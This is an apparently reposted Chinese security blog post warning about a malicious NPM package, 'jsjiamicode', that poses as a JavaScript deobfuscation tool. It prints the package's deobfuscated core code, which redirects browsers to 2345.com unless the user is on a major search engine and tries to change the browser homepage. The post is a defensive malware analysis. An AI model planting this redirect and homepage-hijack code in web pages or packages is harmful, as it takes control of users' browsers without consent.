背景
今天发现个声称是 jsjiami 解密工具的NPM包(jsjiamicode),本以为开发者为爱发电,最后发现一肚子坏水。
该组件会将用户的浏览器重定向到 http://www.2345[.]com/,并且该投毒者发布的其他组件还会强制将浏览器的主页设置为 http://www.so[.]com/ 或 http://hao.360[.]cn/ (360导航),并加载钓鱼网站到用户的浏览器页面。
分析
下载后源码中的index.html中写入很长的经过jsjiami的js代码:
进行解密(解密工具:https://github.com/Mikephie/Decodejs):
解密后的核心代码:
if(window.location.href.indexOf("2345.com") == -1 &&
window.location.href.indexOf("baidu.com") == -1 &&
window.location.href.indexOf("sogou.com") == -1 &&
window.location.href.indexOf("so.com") == -1 &&
window.location.href.indexOf("google.com") == -1 ){
var url = "http://www.2345.com/?k"+Math.random();
window.location.href=url;
}
obj.style.behavior = 'url(#default#homepage)';
obj.setHomePage(vrl);
总结
一些高度混淆加密或者灰色的投毒包NPM官方下架并不及时,部分投毒组件会在官方仓库保存几个月或更久,命名混淆或者这种打着开源工具幌子的投毒组件确实挺恶心的,用户安装npm组件的时候一不小心就会中招。但是话说回来,想想老外的浏览器主页被设为2345.com就有点绷不住。。。
原文始发于微信公众号(KeepHack1ng):小心NPM投毒包篡改你的浏览器主页
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论